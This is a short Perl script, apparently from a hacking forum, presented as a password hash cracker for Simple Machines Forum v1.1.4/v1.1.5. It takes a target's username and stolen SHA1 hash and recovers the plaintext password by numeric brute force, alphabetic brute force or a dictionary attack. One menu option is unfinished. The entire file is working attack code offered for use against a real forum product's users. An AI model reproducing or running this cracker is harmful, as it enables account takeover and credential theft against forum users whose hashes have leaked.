#!/usr/bin/perl
#
# Simple Machines Forum v1.1.4/v1.1.5 password hash cracker
# not some hack tool you kid. 
# Quickly coded, feel free to improve
#
# Iron
# http://www.randombase.com
# or better: http://www.perlforums.org
#
use Digest::SHA1 'sha1_hex';
print "
Simple Machines Forum v1.1.4/v1.1.5 password hash cracker
by Iron - http://www.randombase.com / http://www.perlforums.org

Menu..
1. Numeric attack
2. Alphabetic attack or whatever
3. Mix 'em up Johnny
4. Dictionary attack
< Choice > ";
chomp($c=<stdin>);
print "[+]Username of the target: ";
chomp($u=lc(<stdin>));
print "[+]Password hash of the target: ";
chomp($p=<stdin>);
print "[+]Cracking... could take a while";
if($c eq '1')
{
	numeric();
}
elsif($c eq '2')
{
	alpha();
}
elsif($c eq '3')
{
	mix();
}
elsif($c eq '4')
{
	dict();
}

sub numeric
{
	$i = 0;
	while(sha1_hex($u.$i) ne $p){$i++;}
	print "\n[+]Sweet! Found the password: ".$i;
}
sub alpha
{
	for($i = "a";$i ne "zzzzzzz" && sha1_hex($u.$i) ne $p;$i++){}
	print "\n[+]Sweet! Found the password: ".$i;
}
sub mix
{
	print "Not finished. Yet.";
}
sub dict # needs some cleaning to make it faster
{
	print "\n[+]I'll need a dictionary though, care to give its filename? ";
	chomp($dict=<stdin>);
	open(d,"<".$dict);
	$found = 0;
	while(($line = <d>))
	{
		chomp($line);
		if(sha1_hex($u.$line) eq $p)
		{
			print "[+]Sweet! Found the password: ".$line;
			$found = 1; next;
		}
	}
		if(!$found)
		{
			print "[-]Not sweet. I couldn't find the password in your dictionary.";
		}
}